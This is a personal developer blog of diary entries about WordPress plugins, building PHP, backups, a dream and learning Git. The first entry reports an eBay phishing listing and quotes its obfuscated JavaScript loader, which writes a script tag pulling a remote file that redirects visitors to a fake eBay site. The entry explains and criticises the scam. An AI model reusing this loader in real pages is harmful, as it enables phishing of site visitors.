Wednesday, 18 March 2015

eBay still allowing redirecting js in listings

Today I came across another ebay listing that redirects you to a fake ebay site, so it seems eBay still haven't fixed this problem. (Or they fixed it but the scammers have found another alternative). I guess that eBay allow js in auction listings because some sellers like to use auction widgets to show off their other items. It would be much safer if eBay just had their own widget people could use and didn't allow users to input js.

The hack looks like this, as part of the description they include the following:

<script> var _0x2786=["\x53\x43","\x52\x49","\x50\x54","\x53\x52","\x43\x3D","\x68\x74\x74","\x70\x3A\x2F\x2F","\x6C\x6F\x73\x73\x65\x72\x74\x69\x6D\x65\x2E\x63\x6F\x6D\x2F\x78\x69\x78\x6B\x6D\x73\x6E\x65\x2E\x6A\x73","\x3C","\x20\x74\x79\x70\x65\x3D\x27\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x27","\x3E","\x77\x72\x69\x74\x65","\x3C\x2F"];var ya=_0x2786[0];var yb=_0x2786[1];var yc=_0x2786[2];var yd=_0x2786[3];var ye=_0x2786[4];var yf=_0x2786[5];var yg=_0x2786[6];var fy0=_0x2786[7];document[_0x2786[11]](_0x2786[8]+ya+yb+yc+_0x2786[9]+yd+ye+yf+yg+fy0+_0x2786[10]);document[_0x2786[11]](_0x2786[12]+ya+yb+yc+_0x2786[10]); </script>

Basically the script adds another script to the page. This other script then does the redirection. The text that makes up the script tag to add is split into pieces, and they've encoded the characters as unicode rather than using utf-8 / ascii. If you look at the _0x2786 array, it looks like this:

Wednesday, 4 March 2015

Good books are too expensive

I spent most of this morning trying to get one of my wordpress plugins to work with the wp super cache plugin without late init enabled. I got quite far, then realised that my plugin actually needs to call the database for one of its methods, and so wouldn't work without late init. So most of my work this morning was just scrapped.

In the afternoon I noticed a book on eBay called Great Stalinist Photographic Books - RODCHENKO, EL LISSITZKY - Rare, Brand New, which was selling for £200! I checked Amazon, and it was a similar price on there too. However, doing a bit more checking it seems it can be had cheaper (though still expensively) - $70.90 + $3.99 shipping new from Amazon Marketplace (a different entry for the book where it is titled Paradnaja kniga Strany Sovetov. 2007 / Great Stalinist Photographic Books (Fotoiskusstvo) (Hardcover)). Or from Ozonru, where it is selling for £41.40.

I contacted another website that had the book listed and had a price, but didn't seem to have any way to buy online. So I'll see if it can be had cheaper from there. Likely they don't have it in stock, don't ship to the UK, or want the payment through WebMoney (which is not available in the UK).

Saturday, 7 February 2015

Descripting

This morning I did some work on a couple of my wordpress plugins.

In the afternoon I wrote a blog post for my photography blog. I got that done fairly quickly. Then I realised that I would really need to add descriptions and keywords for the images to illustrate the blog post, and then upload the images to the site. So I spent most of the rest of the afternoon and evening doing that.

The description writing process was fairly simple. I didn't have any photos of buildings I needed to research to try and find out what they were. It was just photos of trees and fields. I just had to write a description of what was in the image. But it still took me ages.

Anyway, at least I got it done in the end. Though I still haven't selected which ones to use to illustrate the blog post, or uploaded any of them yet. A task I can finish off tomorrow hopefully.

Monday, 2 February 2015

Exiting a dream

This morning I was having a dream, I can't remember most of it, but I do remember the end. I was going on a 2D computer game featuring Toad (from the Mario games) on an old yellowed plastic CRT monitor. The monitor was in front of some windows.

I needed to finish what I was doing (possibly I knew it was time to wake up?), so I tried to pull the curtains, from one side at a time. After I'd pulled the curtains on each side of the window, there was still a big gap between them. So I pulled the right curtain a bit more, but still there was a gap. I pulled the left curtain a bit more, and there was still a gap left.

I looked up at where the right curtain was attached to the curtain rail and noticed it was scrunched up. I gave it a hard tug and it nearly closed the gap, there was just a small gap left, which I thought was good enough. But further down was a larger gap, I looked and noticed that the left curtain was scrunched up at the bottom.

But in the gap between the curtains, sitting on the window sill, was a model of a man (not an accurate model) made from octagonal tazos. But unlike in real life, most of the tazos were positioned just one above the other. (They need to be positioned at right-angles to one another to be able to lock together in real life).

I figured that if I unscrunched the bottom of the left curtain so that it covered the model, then when pulling the curtains the next day, it might knock the figure over, so I might as well leave the curtain as it was.

On the computer I pressed the Esc key to quit the game I was going on. Then I realised that I had forgotten to save, and the game just quits when you press Esc without asking you if you want to save. This wasn't a problem in that I hadn't done anything on the game. But I knew that next time I tried to go on it I would get a message that I had quit without saving.

I then shut down the computer, which involved bringing up an on-screen keyboard that had a 'quit' or 'exit' (I can't remember) button at the top left. Then my dream ended. So it seems that this actually quit my dream.

Monday, 26 January 2015

Trying to build PHP for 3 days and binary comparing

Someone asked me about writing a wordpress plugin for them, and to do this I needed to rely on another wordpress plugin. Only problem was that the other plugin wouldn't run on my PHP installation as it required the gmp or bcmath extensions, neither of which my PHP installation included.

So I tried building the latest version of PHP, along with the latest versions of the libs the various extensions I need depend on. The first problem I had was that I couldn't get openldap to build. After looking into it, it seems that Oracle changed their licence terms for the newer versions of BerkleyDB and openldap is not 'compatible' with these licence terms. So it includes a check to make sure it won't work with the newer versions of BerkleyDB.

I couldn't see how to get openldap compiled without BerkleyDB, so I just gave up. I don't really need the ldap extension for PHP anyway.

After building all the needed dependencies, I tried building PHP, but got an error during compiling. I searched to see if anyone else had the same problem, and there didn't seem to be a solution. Just debugging advice - try and work out the minimum configure needed to reproduce the error, so you can see if it is a certain extension or two conflicting extensions causing the problem.

I then spent almost three days just trying to build PHP, changing some option, trying again, etc. in an effort to work out what the problem was.

The strange thing is, that when I started doing this, I got a different error relating to openssl, even if I was compiling with no other extensions specified in my configure line. Adding --disable-all to configure, I then managed to build with openssl. Gradually adding all the options back got me to the point where the original error message popped up again.

After many more build attempts I figured out the issue was my usage of the tidy-nu lib rather than the very old and outdated tidy. Changing this back to the old tidy and removing the --disable-all I was able to build okay. But that doesn't really make sense - what happened to the openssl error I was getting previously? Anyway, I guess finally getting it to build was the main thing.

Each build attempt takes at least half an hour before you see whether it was successful or not. This is why it took three days of changing the different configure options, rebuilding, then seeing if it worked or not before trying again with different options to narrow down the problem.

Today I was doing my morning backup as usual, but my backup drive was full. So I decided to re-organise my files a bit and move some to another drive. After moving the files I did a binary compare against one of the backups, and a few files were different. One was a Photoshop file, and one of the layers in the backup file had become corrupted. Another was a NEF (Nikon RAW file) that had become corrupted on the backup.

Two were large panoramas with many layers. I looked through the images, layer by layer, looking to see any evidence of corruption, both the backup copies and the originals. This took quite a while. However I couldn't see any problems. Since the other two images were both corrupted on the backups I decided to just copy the originals over the backups. The reason for doing this is just to avoid those files being flagged again in a binary compare in the future and me having to perform the same procedure.

With the files safely in their new location I backed them up to one of the disks I use for backing up the drive they are now located on. After doing that I ran a binary compare between the two drives. The new files had all copied okay, but there were a few corrupted files in other places, again, all on the backup. As well as images there were also some shortcuts that had become corrupted, and even a text file:

Thursday, 8 January 2015

Baking, checking, and fixing

Yesterday I was doing my monthly website stats checking, and also made some Eccles Cakes. I made the Eccles Cakes with grapefruit zest rather than lemon or orange, and I don't think they were as nice as normal.

As usual, my stats checking brought a number of issues to my attention, and so this morning (and yesterday evening) was spent looking into those issues and trying to fix them.

Tuesday, 6 January 2015

Gitting

Today I was trying to learn how to use Git. I started reading Sitepoint's Git Fundamentals ebook a week or so ago, then finished it off today. Unfortunately it was pretty useless and written for mac / linux users. E.g. discussing the head command it says to use HEAD^, but ^ is an escape character in Windows so you actually need to type HEAD^^.

I found a much better guide, which is free, here: Git Tutorial. This covers much more and explains the different commands better than the Sitepoint guide (though the section about branches seems to be in the wrong place). The Sitepoint guide doesn't really cover enough to start using git for real purposes, only enough for a very simple demonstration.

In the evening I set up git for one of my websites and started making some changes.